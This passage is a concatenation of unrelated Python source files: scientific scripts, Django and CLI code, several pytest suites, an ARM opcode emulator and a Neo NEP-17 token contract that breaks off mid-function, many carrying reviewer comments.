        assert is_close, "Output value {} not as expected {}".format(evaluated, out)
#-------------------------------------------------------------------------------
@pytest.mark.parametrize("inp,out", INC_TESTS)
def test_inc(inp, out):
    """Adding one to an Icon must evaluate to the expected integer."""
    icon = pb.Icon('x')
    expression = icon[:] + 1
    evaluated = int(expression.subs({'x': inp}))
    is_close = np.isclose(evaluated, out)
    if isinstance(inp, np.ndarray):
        assert np.all(is_close), "Output values not as expected"
    else:
        assert is_close, "Output value {} not as expected {}".format(evaluated, out)
#-------------------------------------------------------------------------------
|
from turtle import *

# Canvas and pen configuration.
bgcolor("green")    # background color
pencolor("red")     # color of the drawn pattern
pensize(10)         # width of the pattern's line

CIRCLE_RADIUS = 100  # radius of each circle
TURN_ANGLE = 36      # rotation between consecutive circles

# Draw circles, turning TURN_ANGLE degrees after each one, until a full
# 360-degree revolution is complete (360 / 36 = 10 circles).
for _ in range(360 // TURN_ANGLE):
    circle(CIRCLE_RADIUS)
    right(TURN_ANGLE)

exitonclick()  # close the window when the user clicks it
#!/usr/bin/env python
import glob
from pyraf import iraf
import json
from sys import argv
# First CLI argument: name of the file listing object frames to extract.
objlist = argv[1]

# Load per-instrument CCD settings written by the setup step.
with open('myccds.json') as file:
    settings = json.loads(file.read())
side = settings['mysettings']['side']

if side == "Blue":
    print("Settings for blue side will be used.")
    disp_axis = 1
elif side == "Red":
    print("Settings for red side will be used.")
    # NOTE(review): red side uses the same axis as blue — confirm intended.
    disp_axis = 1
else:
    # BUG FIX: raw_input() is Python 2 only (NameError on Python 3); use
    # input() and coerce to int for consistency with the branches above.
    disp_axis = int(input("Dispersion axis: 1 for line; 2 for column."))

print('Loading IRAF packages ...')
iraf.imred()
iraf.ccdred()
iraf.twodspec()
iraf.apextract()

print('unlearning previous settings...')
iraf.ccdred.unlearn()
iraf.ccdred.ccdproc.unlearn()
iraf.ccdred.combine.unlearn()
iraf.apextract.apall.unlearn()
iraf.apextract.dispaxis = disp_axis
iraf.apextract.verbose = 'no'

print('Extracting object aperture spectrum...')
iraf.apextract.apall.unlearn()
iraf.apextract.apall.readnoise = 3.5
iraf.apextract.apall.gain = 1.5
iraf.apextract.apall.format = 'multispec'
# Run the full interactive aperture workflow.
iraf.apextract.apall.interac = True
iraf.apextract.apall.find = True
iraf.apextract.apall.recente = True
iraf.apextract.apall.resize = True
iraf.apextract.apall.edit = True
iraf.apextract.apall.trace = True
iraf.apextract.apall.fittrac = True
iraf.apextract.apall.extract = True
iraf.apextract.apall.extras = True
iraf.apextract.apall.review = True
iraf.apextract.apall.background = 'fit'
iraf.apextract.apall.pfit = 'fit2d'
iraf.apextract.apall.weights = 'variance'
# Extract each crf_* frame in the list to an acrf_* spectrum.
iraf.apextract.apall(input='crf_//@'+objlist, output='acrf_//@'+objlist)
print('--- DONE ---')
|
# coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models into model package
from swagger_server.models.model_flow_chart import ModelFlowChart
from swagger_server.models.model_flow_chart_edge import ModelFlowChartEdge
from swagger_server.models.model_flow_chart_edge_meta import ModelFlowChartEdgeMeta
from swagger_server.models.model_flow_chart_extension import ModelFlowChartExtension
from swagger_server.models.model_flow_chart_extension_fixed_config import ModelFlowChartExtensionFixedConfig
from swagger_server.models.model_flow_chart_extension_meta import ModelFlowChartExtensionMeta
from swagger_server.models.model_flow_chart_graph import ModelFlowChartGraph
from swagger_server.models.model_flow_chart_meta import ModelFlowChartMeta
from swagger_server.models.model_flow_chart_node import ModelFlowChartNode
from swagger_server.models.model_flow_chart_node_component import ModelFlowChartNodeComponent
from swagger_server.models.model_flow_chart_node_component_meta import ModelFlowChartNodeComponentMeta
from swagger_server.models.model_flow_chart_node_linked_edges import ModelFlowChartNodeLinkedEdges
from swagger_server.models.model_flow_chart_node_meta import ModelFlowChartNodeMeta
|
#!/usr/bin/python
"""
Setup tools script for Site-RM Utilities. This is mandatory for Frontend
and the agents to have this installed.
To Install:
python setup-agent.py build install
Copyright 2019 California Institute of Technology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Title : dtnrm
Author : Justas Balcas
Email : justas.balcas (at) cern.ch
@Copyright : Copyright (C) 2019 California Institute of Technology
Date : 2019/05/26
"""
from setuptools import setup
from setupUtilities import list_packages, get_py_modules
# Package metadata and layout for the DTN-RM utility libraries; all sources
# live under src/python/ (see package_dir).
setup(
    name='DTNRM-Utilities',
    version="0.1",
    long_description="DTN-RM Utilities Installation",
    author="Justas Balcas",
    author_email="justas.balcas@cern.ch",
    url="http://hep.caltech.edu",
    download_url="https://github.com/sdn-sense/dtnrm-utilities",
    keywords=['DTN-RM', 'system', 'monitor', 'SDN', 'end-to-end'],
    # NOTE(review): very old pyOpenSSL pin (2017) — confirm still required.
    install_requires=['pyOpenSSL==17.5.0'],
    package_dir={'': 'src/python/'},
    packages=['DTNRMLibs'] + list_packages(['src/python/DTNRMLibs/']),
    py_modules=get_py_modules(['src/python/DTNRMLibs']),
)
|
#Non project imports
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
#Project imports
from GuildPosts.models import PostModel
from UserProfiles.models import UserProfileModel
from GroupChat.models import Message
from GroupChat.forms import ChatModelForm
from Notifications.models import Notification
from GuildProfiles.models import GuildProfileModel
from .FindUserGuild import FindUserGuild
from GuildPosts.models import Like
# Create your views here.
def Discover(request):
    # Render the "Discover" feed: every guild post, plus the current user's
    # guild chat, notifications, and a POST handler for new chat messages.
    PostList = PostModel.objects.filter()
    # NOTE(review): UserName is computed but never used (the template context
    # below reads request.user.username directly) — confirm it can go.
    UserName = request.user.username
    NotificationLi = Notification.objects.filter(UserNotify = request.user)
    MessageList = Message.objects.filter(GuildId = FindUserGuild(request.user.id))
    Temp = []
    Temp2 = []
    FullList = []
    if request.method == 'POST':
        # Persist a new chat message for the user's guild.
        form = ChatModelForm(request.POST)
        if form.is_valid():
            Chat = Message()
            Chat.UserId = request.user
            Chat.GuildId = FindUserGuild(request.user.id)
            Chat.MessageBody = form.cleaned_data['MessageBody']
            Chat.ProfId = UserProfileModel.objects.get(UserProfileRelation = request.user)
            Chat.save()
    else:
        form = ChatModelForm()
    # Build, per post: [image, guild name, date, body, link, like count,
    # member profiles] and collect them into FullList for the template.
    for k in PostList:
        try:
            Temp.append(k.PostGuildProfile.GuildProfileImage)
        except:
            # Guild has no profile image; fall back to an empty string.
            Temp.append("")
        Temp.append(k.PostGuild.GuildName)
        Temp.append(k.PostDate)
        Temp.append(k.PostBody)
        Temp.append(k.PostLink)
        Temp.append(len(Like.objects.filter(PostRelation=k)))
        # NOTE(review): MemberListModel is never imported in this module, so
        # each lookup below raises NameError which the bare excepts swallow —
        # Temp2 always stays empty. Confirm the intended import and narrow
        # these excepts to the expected ObjectDoesNotExist.
        try:
            Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser1)))
        except:
            pass
        try:
            Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser2)))
        except:
            pass
        try:
            Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser3)))
        except:
            pass
        try:
            Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser4)))
        except:
            pass
        try:
            Temp2.append(UserProfileModel.objects.get(UserProfileRelation=((MemberListModel.objects.get(Guild=k.PostGuild)).GuildUser5)))
        except:
            pass
        Temp.append(Temp2)
        FullList.append(Temp)
        Temp = []
        Temp2 = []
    return render(request, 'Discover/Discover.html', {'FullList':FullList,'form':form, 'NotificationLi':NotificationLi, 'MessageList':MessageList,'PostList':PostList, 'UserName':request.user.username})
|
from tapis_cli.display import Verbosity
from .create import MetadataCreate
from .formatters import MetadataFormatOne
from .helpers import create_update, generate_name
from .models import Metadata
from .mixins import MetadataUUID
from .mixins import UploadMetadataFile
from . import API_NAME, SERVICE_VERSION
class MetadataUpdate(MetadataFormatOne, UploadMetadataFile, MetadataUUID):
    """Update an existing Metadata document, addressed by its UUID."""

    HELP_STRING = 'Update an existing Metadata document by UUID'
    # NOTE(review): the triple-M "COMMMAND" typo is preserved because the
    # attribute name may be looked up elsewhere; renaming would be an
    # interface change.
    LEGACY_COMMMAND_STRING = 'metadata-addupdate'

    VERBOSITY = Verbosity.RECORD
    EXTRA_VERBOSITY = Verbosity.RECORD_VERBOSE

    def get_parser(self, prog_name):
        """Extend the base parser with value/rename and file-upload options."""
        parser = super(MetadataUpdate, self).get_parser(prog_name)
        name_group = parser.add_mutually_exclusive_group(required=False)
        parser.add_argument('-V',
                            '--value',
                            dest='meta_value',
                            metavar='VALUE',
                            help='Value for the document')
        name_group.add_argument('-N',
                                '--rename',
                                dest='meta_name',
                                metavar='NEW_NAME',
                                help='Rename document')
        parser = UploadMetadataFile.extend_parser(self, parser)
        parser = MetadataUUID.extend_parser(self, parser)
        return parser

    def take_action(self, parsed_args):
        """Build the update payload and send it to the Metadata service.

        Raises RuntimeError when both --value and -F are supplied.
        """
        parsed_args = self.preprocess_args(parsed_args)
        self.requests_client.setup(API_NAME, SERVICE_VERSION, 'data')
        self.update_payload(parsed_args)
        self.handle_file_upload(parsed_args)
        identifier = MetadataUUID.get_identifier(self, parsed_args)
        body = None
        if self.json_file_contents != {} and parsed_args.meta_value is not None:
            # BUG FIX: corrected "Specifing" -> "Specifying" in the
            # user-facing error message.
            raise RuntimeError(
                'Specifying both --value and -F options is not supported.')
        # Blindly accept the JSON file if passed. Otherwise construct a
        # name/value record, generating the name if needed.
        if self.json_file_contents != {}:
            body = self.json_file_contents
        else:
            # Fetch the current document so unspecified fields survive.
            doc = self.tapis_client.meta.getMetadata(uuid=identifier)
            body = {
                'name': doc.get('name'),
                'value': doc.get('value'),
                'associationIds': doc.get('associationIds', [])
            }
            if parsed_args.meta_name is not None:
                body['name'] = parsed_args.meta_name
            if parsed_args.meta_value is not None:
                body['value'] = parsed_args.meta_value
        headers = self.render_headers(Metadata, parsed_args)
        rec = self.tapis_client.meta.updateMetadata(body=body, uuid=identifier)
        data = []
        for key in headers:
            val = self.render_value(rec.get(key, None))
            data.append(val)
        return (tuple(headers), tuple(data))
|
from armulator.armv6.opcodes.abstract_opcode import AbstractOpcode
from bitstring import BitArray
class Usad8(AbstractOpcode):
    """USAD8: unsigned sum of absolute differences.

    Computes |Rn.byte[i] - Rm.byte[i]| for each of the four byte lanes
    and writes the total into register d.
    """

    def __init__(self, m, d, n):
        super(Usad8, self).__init__()
        self.m = m
        self.d = d
        self.n = n

    def execute(self, processor):
        if processor.condition_passed():
            total = 0
            # Byte lanes as [start, end) bit slices of the 32-bit registers.
            for lane_start, lane_end in ((24, 32), (16, 24), (8, 16), (0, 8)):
                first = processor.registers.get(self.n)[lane_start:lane_end].uint
                second = processor.registers.get(self.m)[lane_start:lane_end].uint
                total += abs(first - second)
            processor.registers.set(self.d, BitArray(uint=total, length=32))
|
'''
Plot predictions of a selected sequence from Caltech Pedestrian Dataset (Dollar et al. 2009, http://www.vision.caltech.edu/Image_Datasets/CaltechPedestrians/) outputted by trained PreCNet.
Based on code related to PredNet - Lotter et al. 2016 (https://arxiv.org/abs/1605.08104 https://github.com/coxlab/prednet).
'''
import os
import numpy as np
from six.moves import cPickle
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from keras.models import load_model
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Input, Dense, Flatten
from precnet import PreCNet
from data_utils import SequenceGenerator
#choose model (trained on kitti/bdd_large(2M)/bdd_small(41K))
#from kitti_settings import *
from bdd_large_settings import *
#from bdd_small_settings import *
import tensorflow as tf
import hickle as hkl
batch_size = 1
# Indices (into the test set) of the first and last frame to plot.
start_img = 18648
end_img = 18658
#other sequences from the article (figures)
#start_img = 18912
#end_img = 18922
#
#start_img = 39749
#end_img = 39759
#
#start_img = 39809
#end_img = 39819
#
#start_img = 5522
#end_img = 5532
#
#start_img = 38915
#end_img = 38925
#
#start_img = 1180
#end_img = 1190
#
#start_img = 18648
#end_img = 18658
#
#start_img = 8347
#end_img = 8357
#
#start_img = 493
#end_img = 503
# Number of timesteps in the selected sequence (inclusive range).
nt = end_img-start_img+1

data_file = os.path.join(DATA_DIR, 'X_pedest_test.hkl')
source_file = os.path.join(DATA_DIR, 'sources_pedest_test.hkl')

#choose model (trained on kitti/bdd_large(2M)/bdd_small(41K))
#model_file = os.path.join(WEIGHTS_DIR, 'precnet_kitti_model.1000.h5')
model_file = os.path.join(WEIGHTS_DIR, 'precnet_bdd100k_model.10000.h5')
#model_file = os.path.join(WEIGHTS_DIR, 'precnet_bdd100k_model.1000.h5')

# Load frames and rescale pixel values to [0, 1].
X = hkl.load(data_file)
X=X.astype(np.float32) / 255
sources = hkl.load(source_file)

train_model=load_model(model_file,custom_objects = {'PreCNet': PreCNet})

# Create testing model (to output predictions) by rebuilding the PreCNet
# layer with 'prediction' output mode and the trained weights.
layer_config = train_model.layers[1].get_config()
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'] if 'data_format' in layer_config else layer_config['dim_ordering']
test_precnet = PreCNet(weights=train_model.layers[1].get_weights(), **layer_config)
input_shape = list(train_model.layers[0].batch_input_shape[1:])
input_shape[0] = nt
inputs = Input(shape=tuple(input_shape))
predictions = test_precnet(inputs)
test_model = Model(inputs=inputs, outputs=predictions)

# Build a single batch holding the selected frame sequence.
X_test_tmp=[]
X_test=[]
for i in range(start_img,end_img+1):
    X_test_tmp.append(X[i])
X_test.append(X_test_tmp)
X_test=np.array(X_test)

X_hat = test_model.predict(X_test, batch_size)
if data_format == 'channels_first':
    # Move channels last so the arrays can be rendered as images.
    X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
    X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))

plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_selected_plots_pedest/')

from PIL import Image
if not os.path.exists(RESULTS_SAVE_DIR): os.mkdir(RESULTS_SAVE_DIR)
if not os.path.exists(plot_save_dir): os.mkdir(plot_save_dir)

# Tile frames horizontally (actual row on top, predicted row below) and
# save the composite as one PNG.
for t in range(nt):
    if t==0:
        act_tmp=X_test[0,t]
        pred_tmp=X_hat[0,t]
    else:
        act_tmp=np.concatenate((act_tmp, X_test[0,t]), 1)
        pred_tmp=np.concatenate((pred_tmp, X_hat[0,t]), 1)
conc_im=np.concatenate((act_tmp, pred_tmp), 0)
im = Image.fromarray((conc_im * 255).astype(np.uint8))
im.save(plot_save_dir + 'plot_caltech' + str(start_img) + '-' + str(end_img) + '.png')
|
import asynctest
import pytest
from jsondaora import dataclasses
@pytest.mark.asyncio
async def test_should_set_already_not_found_error_when_get_many_with_fields(
    repository, mocker
):
    """When memory, the not-found marker, and the fallback all miss, the
    query must yield nothing, record the not-found marker, and never write
    entity data back to memory."""
    fake_entity = 'fake'
    # Memory returns no values for the requested fields.
    repository.memory_data_source.hmget = asynctest.CoroutineMock(
        return_value=[None, None, None]
    )
    # The not-found marker does not exist yet.
    repository.memory_data_source.exists = asynctest.CoroutineMock(
        side_effect=[False]
    )
    # The fallback store misses as well.
    repository.fallback_data_source.get = asynctest.CoroutineMock(
        return_value=None
    )
    repository.memory_data_source.set = asynctest.CoroutineMock()
    repository.memory_data_source.hmset = asynctest.CoroutineMock()
    # The query must yield no entities at all.
    assert [
        e
        async for e in repository.query(
            many=[fake_entity], fields=['id', 'integer', 'inner_entities']
        ).entities
    ] == []
    # Exactly the requested fields were asked of memory.
    assert repository.memory_data_source.hmget.call_args_list == [
        mocker.call('fake:fake', 'id', 'integer', 'inner_entities'),
    ]
    assert repository.memory_data_source.exists.call_args_list == [
        mocker.call('fake:not-found:fake')
    ]
    assert repository.fallback_data_source.get.call_args_list == [
        mocker.call('fake:fake')
    ]
    # The not-found marker was written so future lookups short-circuit.
    assert repository.memory_data_source.set.call_args_list == [
        mocker.call('fake:not-found:fake', '1')
    ]
    assert not repository.memory_data_source.hmset.called
@pytest.mark.asyncio
async def test_should_get_many_from_fallback_with_fields(
    repository, fake_entity
):
    """A memory miss with a field projection must be served from the
    fallback store and re-cached in memory."""
    # Ensure both the entity and its not-found marker are absent in memory.
    await repository.memory_data_source.delete('fake:fake')
    await repository.memory_data_source.delete('fake:not-found:fake')
    # Seed the fallback store with the serialized entity.
    repository.fallback_data_source.db['fake:fake'] = dataclasses.asdict(
        fake_entity
    )
    # Fields outside the requested projection come back as None.
    fake_entity.number = None
    fake_entity.boolean = None
    entities = [
        e
        async for e in repository.query(
            many=[fake_entity.id], fields=['id', 'integer', 'inner_entities']
        ).entities
    ]
    assert entities == [fake_entity]
    # BUG FIX: exists() is a coroutine function on this data source (delete
    # above is awaited); without ``await`` the assertion tested a coroutine
    # object, which is always truthy, making it vacuous.
    assert await repository.memory_data_source.exists('fake:fake')
|
from pathlib import Path
import logging
import yaml
def load_config(config_path, section):
    """Load *section* from a YAML config file.

    Returns the section's value when present, the whole parsed config when
    the section is missing, and ``None`` when *config_path* does not exist
    or is not a ``.yaml`` file.
    """
    config_path = Path(config_path)
    # BUG FIX: the original tested ``config_path.exists`` without calling
    # it; a bound method is always truthy, so the existence check never
    # fired and a missing file crashed later in read_text().
    if not config_path.exists():
        # logging.warn is a deprecated alias; use logging.warning. Also
        # fixed a stray 'f' that leaked into the original message text.
        logging.warning('Config path %s does not exist! Ignoring Path', config_path)
    elif config_path.suffix != '.yaml':
        logging.warning('Config Path %s not a valid yaml file', config_path)
    else:
        logging.debug('Config Path: %s found. Loading...', config_path)
        # An empty YAML file parses to None; treat it as an empty mapping
        # so the membership test below cannot raise TypeError.
        config = yaml.safe_load(config_path.read_text()) or {}
        if section in config:
            return config[section]
        return config
    # Invalid path: fall through and return None, as the original did.
    return None
|
# Copyright 2018 University of Groningen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for the :mod:`vermouth.processors.average_beads` module.
"""
import pytest
import networkx as nx
import numpy as np
from vermouth.processors import average_beads
@pytest.fixture
def mol_with_subgraph():
    """
    Create a molecule with a subgraph under the "graph" attribute of each node.

    Each node also carries "mapping_weights" and precomputed "target *"
    arrays: the expected averaged position for each weighting scheme
    (None/False -> plain average; 'mass'/'not mass' -> weighted average).
    """
    mol = nx.OrderedGraph()

    # Node 0: three underlying particles with mapping weights 1:2:3.
    subgraph = nx.Graph()
    subgraph.add_nodes_from((
        (0, {'mass': 1.1, 'not mass': 2.1, 'position': np.array([1, 2, 3], dtype=float),}),
        (1, {'mass': 1.2, 'not mass': 2.2, 'position': np.array([2, 3, 4], dtype=float),}),
        (2, {'mass': 1.3, 'not mass': 2.3, 'position': np.array([3, 4, 5], dtype=float),}),
    ))
    mol.add_node(0, **{
        "graph": subgraph,
        "mapping_weights": {0: 1, 1: 2, 2: 3},
        "target mass": np.array([2.378378378, 3.378378378, 4.378378378]),
        "target not mass": np.array([2.358208955, 3.358208955, 4.358208955]),
        "target None": np.array([2.333333333, 3.333333333, 4.333333333]),
        "target False": np.array([2.333333333, 3.333333333, 4.333333333]),
    })

    # Node 1: two particles with mapping weights 2:3.
    subgraph = nx.Graph()
    subgraph.add_nodes_from((
        (0, {'mass': 1.2, 'not mass': 2.2, 'position': np.array([2, 3, 4], dtype=float),}),
        (1, {'mass': 1.3, 'not mass': 2.3, 'position': np.array([3, 4, 5], dtype=float),}),
    ))
    mol.add_node(1, **{
        "graph": subgraph,
        "mapping_weights": {0: 2, 1: 3},
        "target mass": np.array([2.619047619, 3.619047619, 4.619047619]),
        "target not mass": np.array([2.610619469, 3.610619469, 4.610619469]),
        "target None": np.array([2.6, 3.6, 4.6]),
        "target False": np.array([2.6, 3.6, 4.6]),
    })

    # Node 2: empty subgraph -> the averaged position is NaN.
    subgraph = nx.Graph()
    mol.add_node(2, **{
        "graph": subgraph,
        "mapping_weights": {},
        "target mass": np.array([np.nan, np.nan, np.nan]),
        "target not mass": np.array([np.nan, np.nan, np.nan]),
        "target None": np.array([np.nan, np.nan, np.nan]),
        "target False": np.array([np.nan, np.nan, np.nan]),
    })

    # Node 3: particles present but every mapping weight is zero -> NaN too.
    subgraph = nx.Graph()
    subgraph.add_nodes_from((
        (0, {'mass': 1.2, 'not mass': 2.2, 'position': np.array([2, 3, 4], dtype=float),}),
        (1, {'mass': 1.3, 'not mass': 2.3, 'position': np.array([3, 4, 5], dtype=float),}),
    ))
    mol.add_node(3, **{
        "graph": subgraph,
        "mapping_weights": {0: 0, 1: 0},
        "target mass": np.array([np.nan, np.nan, np.nan]),
        "target not mass": np.array([np.nan, np.nan, np.nan]),
        "target None": np.array([np.nan, np.nan, np.nan]),
        "target False": np.array([np.nan, np.nan, np.nan]),
    })
    return mol
@pytest.fixture(params=(None, 'mass', 'not mass'))
def mol_with_variable(request, mol_with_subgraph):
    """
    Attach a mock force field declaring 'center_weight' to the molecule.
    """
    class MockForceField(object):
        pass

    force_field = MockForceField()
    force_field.variables = {'center_weight': request.param}
    mol_with_subgraph.force_field = force_field
    return mol_with_subgraph
@pytest.mark.parametrize('weight', (None, 'mass', 'not mass'))
def test_do_average_bead(mol_with_subgraph, weight):
    """
    Normal operation of :func:`average_beads.do_average_bead`: positions
    must match the precomputed targets for the chosen weighting.
    """
    result_mol = average_beads.do_average_bead(
        mol_with_subgraph, ignore_missing_graphs=False, weight=weight,
    )
    expected = np.stack([
        node['target {}'.format(weight)]
        for node in mol_with_subgraph.nodes.values()
    ])
    actual = np.stack([
        node['position'] for node in mol_with_subgraph.nodes.values()
    ])
    assert np.allclose(actual, expected, equal_nan=True)
@pytest.mark.parametrize('weight', ('mass', 'not mass'))
def test_shoot_weight(mol_with_subgraph, weight):
    """
    :func:`average_beads.do_average_bead` must raise when a particle is
    missing the requested weight attribute.
    """
    particle_attrs = mol_with_subgraph.nodes[0]['graph'].nodes[1]
    del particle_attrs[weight]
    with pytest.raises(KeyError):
        average_beads.do_average_bead(
            mol_with_subgraph, ignore_missing_graphs=False, weight=weight,
        )
def test_shoot_graph(mol_with_subgraph):
    """
    :func:`average_beads.do_average_bead` must raise when a node lacks its
    subgraph.
    """
    mol_with_subgraph.nodes[1].pop('graph')
    with pytest.raises(ValueError):
        average_beads.do_average_bead(mol_with_subgraph)
def test_processor_variable(mol_with_variable):
    """The processor must read its weight from the force field variables."""
    mol = average_beads.DoAverageBead().run_molecule(mol_with_variable)
    weight = mol_with_variable.force_field.variables['center_weight']
    expected = np.stack([
        node['target {}'.format(weight)]
        for node in mol_with_variable.nodes.values()
    ])
    actual = np.stack([
        node['position'] for node in mol_with_variable.nodes.values()
    ])
    assert np.allclose(actual, expected, equal_nan=True)
@pytest.mark.parametrize('weight', (False, 'mass', 'not mass'))
def test_processor_weight(mol_with_variable, weight):
    """An explicit weight= argument must override the force field variable."""
    mol = average_beads.DoAverageBead(weight=weight).run_molecule(mol_with_variable)
    expected = np.stack([
        node['target {}'.format(weight)]
        for node in mol_with_variable.nodes.values()
    ])
    actual = np.stack([
        node['position'] for node in mol_with_variable.nodes.values()
    ])
    assert np.allclose(actual, expected, equal_nan=True)
|
from typing import Any, Union
from boa3.builtin import CreateNewEvent, NeoMetadata, metadata, public
from boa3.builtin.contract import Nep17TransferEvent, abort
from boa3.builtin.interop.blockchain import get_contract
from boa3.builtin.interop.contract import GAS, call_contract
from boa3.builtin.interop.runtime import calling_script_hash, check_witness, executing_script_hash
from boa3.builtin.interop.storage import delete, get, put
from boa3.builtin.type import UInt160
# -------------------------------------------
# METADATA
# -------------------------------------------
@metadata
def manifest_metadata() -> NeoMetadata:
    """
    Describe this smart contract's manifest metadata.
    """
    contract_meta = NeoMetadata()
    contract_meta.supported_standards = ['NEP-17']
    contract_meta.author = "Mirella Medeiros, Ricardo Prado and Lucas Uezu. COZ in partnership with Simpli"
    contract_meta.description = "Wrapped GAS Example"
    contract_meta.email = "contact@coz.io"
    return contract_meta
# -------------------------------------------
# TOKEN SETTINGS
# -------------------------------------------
# Script hash of the contract owner
# NOTE(review): zero-filled UInt160 placeholder — set the real owner script
# hash before deployment.
OWNER = UInt160()

# Storage key holding the circulating supply
SUPPLY_KEY = 'totalSupply'

# Symbol of the Token
TOKEN_SYMBOL = 'zGAS'

# Number of decimal places
TOKEN_DECIMALS = 8

# Total Supply of tokens in the system
TOKEN_TOTAL_SUPPLY = 10_000_000 * 100_000_000  # 10m total supply * 10^8 (decimals)

# Storage-key prefix for owner/spender allowance records
ALLOWANCE_PREFIX = b'allowance'

# -------------------------------------------
# Events
# -------------------------------------------

# Standard NEP-17 Transfer event
on_transfer = Nep17TransferEvent
# Fired when an owner authorizes a spender for a given amount
on_approval = CreateNewEvent(
    [
        ('owner', UInt160),
        ('spender', UInt160),
        ('amount', int)
    ],
    'Approval'
)
# -------------------------------------------
# Methods
# -------------------------------------------
@public
def symbol() -> str:
    """
    Return the token's ticker symbol.

    The value is constant across invocations: valid ASCII with no
    whitespace or control characters, limited to uppercase Latin letters,
    and within the recommended 3-8 character length.

    :return: a short string representing symbol of the token managed in this contract.
    """
    return TOKEN_SYMBOL
@public
def decimals() -> int:
    """
    Returns the number of decimal places used by the token.

    A value of 8 means a raw amount is divided by 100,000,000 (10 ^ 8) to get
    its user-facing representation. Constant across invocations, per NEP-17.

    :return: the decimal-place count of the token.
    """
    return TOKEN_DECIMALS
@public
def totalSupply() -> int:
    """
    Returns the total token supply deployed in the system, in raw units.

    The value is not in user representation: a supply of 10,000,000 display
    tokens is reported as 10,000,000 * 10 ^ decimals.

    :return: the total token supply currently recorded in storage.
    """
    stored_supply = get(SUPPLY_KEY)
    return stored_supply.to_int()
@public
def balanceOf(account: UInt160) -> int:
    """
    Looks up the token balance held by the given address.

    :param account: the 20-byte script hash whose balance is requested
    :type account: UInt160
    :return: the raw token balance stored for the account (0 when no entry exists).
    :raise AssertionError: raised if `account` length is not 20.
    """
    assert len(account) == 20
    stored_balance = get(account)
    return stored_balance.to_int()
@public
def transfer(from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
    """
    Transfers an amount of zGAS tokens from one account to another.

    If the method succeeds, it must fire the `Transfer` event and must return True, even if the amount is 0,
    or from and to are the same address.

    :param from_address: the address to transfer from
    :type from_address: UInt160
    :param to_address: the address to transfer to
    :type to_address: UInt160
    :param amount: the amount of zGAS tokens to transfer
    :type amount: int
    :param data: whatever data is pertinent to the onPayment method
    :type data: Any
    :return: whether the transfer was successful
    :raise AssertionError: raised if `from_address` or `to_address` length is not 20 or if `amount` is less than zero.
    """
    # the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
    assert len(from_address) == 20 and len(to_address) == 20
    # the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
    assert amount >= 0
    # NEP-17: return False (do not raise) when the sender's balance cannot cover the amount
    from_balance = get(from_address).to_int()
    if from_balance < amount:
        return False
    # authorization: a contract may move its own funds directly (from == caller);
    # any other sender must have witnessed (signed) the transaction
    if from_address != calling_script_hash:
        if not check_witness(from_address):
            return False
    # skip balance changes if transferring to yourself or transferring 0 cryptocurrency
    if from_address != to_address and amount != 0:
        # remove the sender's storage entry entirely when its balance drops to zero
        if from_balance == amount:
            delete(from_address)
        else:
            put(from_address, from_balance - amount)
        to_balance = get(to_address).to_int()
        put(to_address, to_balance + amount)
    # the Transfer event fires even for no-op transfers (amount 0 / self-transfer), per NEP-17
    on_transfer(from_address, to_address, amount)
    # if the receiver is a deployed contract, it must be notified through onNEP17Payment
    post_transfer(from_address, to_address, amount, data, True)
    # and then it must return true
    return True
@public
def transfer_from(spender: UInt160, from_address: UInt160, to_address: UInt160, amount: int, data: Any) -> bool:
    """
    A spender transfers an amount of zGAS tokens allowed from one account to another.

    If the method succeeds, it must fire the `Transfer` event and must return True, even if the amount is 0,
    or from and to are the same address. The spender's remaining allowance is reduced by `amount`.

    :param spender: the address that is trying to transfer zGAS tokens
    :type spender: UInt160
    :param from_address: the address to transfer from
    :type from_address: UInt160
    :param to_address: the address to transfer to
    :type to_address: UInt160
    :param amount: the amount of zGAS tokens to transfer
    :type amount: int
    :param data: whatever data is pertinent to the onPayment method
    :type data: Any
    :return: whether the transfer was successful
    :raise AssertionError: raised if `spender`, `from_address` or `to_address` length is not 20 or if `amount` is less
    than zero.
    """
    # the parameters from and to should be 20-byte addresses. If not, this method should throw an exception.
    assert len(spender) == 20 and len(from_address) == 20 and len(to_address) == 20
    # the parameter amount must be greater than or equal to 0. If not, this method should throw an exception.
    assert amount >= 0
    # return False when the from account balance does not have enough tokens to spend
    from_balance = get(from_address).to_int()
    if from_balance < amount:
        return False
    # return False when the spender's remaining allowance from this owner is insufficient
    allowed = allowance(from_address, spender)
    if allowed < amount:
        return False
    # authorization: a contract may spend its own allowance directly (spender == caller);
    # any other spender must have witnessed (signed) the transaction
    if spender != calling_script_hash:
        if not check_witness(spender):
            return False
    # consume the allowance; drop the storage entry entirely when it reaches zero
    if allowed == amount:
        delete(ALLOWANCE_PREFIX + from_address + spender)
    else:
        put(ALLOWANCE_PREFIX + from_address + spender, allowed - amount)
